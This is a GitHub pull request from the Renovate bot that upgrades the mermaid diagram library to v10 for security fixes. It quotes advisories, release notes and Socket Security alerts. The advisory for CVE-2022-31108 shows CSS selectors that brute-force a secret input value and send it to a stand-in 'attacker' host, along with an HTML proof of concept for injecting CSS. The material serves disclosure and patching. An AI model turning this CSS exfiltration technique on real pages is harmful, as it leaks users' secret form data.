Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(deps): update dependency mermaid to v10 [security] #23

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

fix(deps): update dependency mermaid to v10 [security] #23

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Sep 25, 2022
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
mermaid ^8.13.10 -> ^10.0.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

GHSA-m4gq-x24j-jpmf

The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.

This affects the built:

  • dist/mermaid.min.js
  • dist/mermaid.js
  • dist/mermaid.esm.mjs
  • dist/mermaid.esm.min.mjs

This will also affect users that use the above files via a CDN link, e.g. https://cdn.jsdelivr.net/npm/[email protected]/dist/mermaid.min.js

Users that use the default NPM export of mermaid, e.g. import mermaid from 'mermaid', or the dist/mermaid.core.mjs file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like npm audit fix.

Patches

  • develop branch: 6c785c93166c151d27d328ddf68a13d9d65adc00
  • backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34

Release Notes

mermaid-js/mermaid (mermaid)

v10.9.3

Compare Source

Updates the bundled version of dependencies in the following files:

  • dist/mermaid.min.js
  • dist/mermaid.js
  • dist/mermaid.esm.mjs
  • dist/mermaid.esm.min.mjs

If you are not using these files (e.g. you are using the default NPM export of mermaid, e.g. import mermaid from 'mermaid', or you are using dist/mermaid.core.mjs), this release is identical to v10.9.2.

This is to avoid potential security issues in KaTeX and DOMPurify, see:

These dependencies have already been updated in v11.0.0.

Changelog

Chore
  • Updates the bundled version of KaTeX to 0.16.11 (2bedd0e)
  • Updates the bundled version of DOMPurify to 3.1.6 (92a07ff)

Full Changelog: mermaid-js/mermaid@v10.9.2...v10.9.3

v10.9.2

Compare Source

This release back-ports https://github.com/mermaid-js/mermaid/pull/5914 to the v10 release line to fix #​5904 (an incompatibility between mermaid and DOMPurify v3.1.7)

Patch Changes

Full Changelog: mermaid-js/mermaid@v10.9.1...v10.9.2

v10.9.1

Compare Source

What's Changed

BugFixes

  • Cleaning of labels in Block diagram by @​knsv

Docs

New Contributors

Full Changelog: mermaid-js/mermaid@v10.9.0...v10.9.1

v10.9.0

Compare Source

Release Notes

We now have Katex support!

image
Demo

🚀 Features

🧰 Maintenance

📚 Documentation

🎉 Thanks to all contributors helping with this release! 🎉

v10.8.0

Compare Source

v10.8.0

Features

image

Documentation

Bug fixes

Chores

New Contributors

Full Changelog: mermaid-js/mermaid@v10.7.0...v10.8.0

v10.7.0

Compare Source

Release Notes

🚀 Features

🐛 Bug Fixes

🧰 Maintenance

📚 Documentation

🎉 Thanks to all contributors helping with this release! 🎉

v10.6.1: 10.6.1

Compare Source

What's Changed

Bugfixes

  • fix(flow): fix invalid ellipseText regex (#​5016) @​aloisklink
    • This was causing freezes in flowcharts that had a ( char in ellipse nodes

Documentation

Chores

🎉 Thanks to all contributors helping with this release! 🎉

v10.6.0: 10.6.0

Compare Source

What's Changed

Fix

Docs

Chores

New Contributors

Full Changelog: mermaid-js/mermaid@v10.5.1...v10.6.0

v10.5.1

Compare Source

What's Changed

Full Changelog: mermaid-js/mermaid@v10.5.0...v10.5.1

v10.5.0: 10.5.0

Compare Source

What's Changed

Features
Bugfixes
Documentation
Chores

New Contributors

Full Changelog: mermaid-js/mermaid@v10.4.0...v10.5.0

v10.4.0

Compare Source

Features

Docs

@renovate renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 30f9754 to 1644792 Compare October 22, 2024 21:10
@renovate renovate bot changed the title fix(deps): update dependency mermaid to v9 [security] fix(deps): update dependency mermaid to v10 [security] Oct 22, 2024
@socket-security Socket Security
Copy link

Report too large to display inline

View full report↗︎

@socket-security Socket Security
Copy link

🚨 Potential security issues detected. Learn more about Socket for GitHub ↗︎

To accept the risk, merge this PR and you will not be notified again.

Alert Package NoteSourceCI
Critical CVE npm/[email protected] ⚠︎

View full report↗︎

Next steps

What is a critical CVE?

Contains a Critical Common Vulnerability and Exposure (CVE).

Remove or replace dependencies that include known critical CVEs. Consumers can use dependency overrides or npm audit fix --force to remove vulnerable dependencies.

Take a deeper look at the dependency

Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support [AT] socket [DOT] dev.

Remove the package

If you happen to install a dependency that Socket reports as Known Malware you should immediately remove it and select a different dependency. For other alert types, you may may wish to investigate alternative packages or consider if there are other ways to mitigate the specific risk posed by the dependency.

Mark a package as acceptable risk

To ignore an alert, reply with a comment starting with @SocketSecurity ignore followed by a space separated list of ecosystem/package-name@version specifiers. e.g. @SocketSecurity ignore npm/[email protected] or ignore all packages with @SocketSecurity ignore-all

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
dependencies
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants